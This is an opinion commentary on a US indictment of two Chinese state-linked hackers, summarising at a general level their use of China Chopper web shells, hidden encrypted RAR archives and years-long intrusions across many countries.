The U.S. decision to demand that China close its Houston consulate dominated the news cycle this week, but an even more important case may have been the indictment of two Chinese hackers, working at times with China’s Ministry of State Security. The indictment, seen here, is breathtaking for two reasons: the hackers revealed amazing sophistication and they were able to steal an incredible volume of secrets. This revelation, combined with many others I chronicled in The New Art of War, such as the APT10 case, suggest the Chinese have mastered world computer systems. They appear to have access to anything they want.
Tech sophistication: we know from the APT10 case that the hackers were able to use malware to fool intrusion detection systems and then capture the keystrokes of legitmate users. They were able to log in as legitimate users. The new twist is this: the hackers placed “web shells” including something called the China Chopper web shell onto the computers of target computers. “It provides an easy-to-use interface through which the user can control web shells installed on multiple victim computers,” the Department of Justice charged. The hackers can use innocuous file names to hide the shells and can even equipment with password-protection. Once hackers find what they want, they compress the files inito encrypted Roshal Active Compressed files. They save these RAR files in the recycle bins of computers, where system administrators are much less likely to look. Then they are exfiltrated.
Scale: The victims of the latest hacks were in the United States, Australia, Belgium, Germany, Japan, Lithuania, the Netherlands, South Korea, Spain, Sweden and the United Kingdom.
The hackers were inside these systems starting in 2009 through 2020. It’s just incredible that they weren’t caught. In addition to stealing information related to Covid-19 treatments, they stole information about radar systems, educational details, Air Force research projects, the works. The thefts extended across dozens of sensitive technology fields.
We are left with this stunning possibility: the Chinese government and affiliated hackers have reached the point of sophistication that they can hack virtually any computer in the world, sight unseen, and stay inside for years. We have yet to awaken to the full dimensions of this challenge.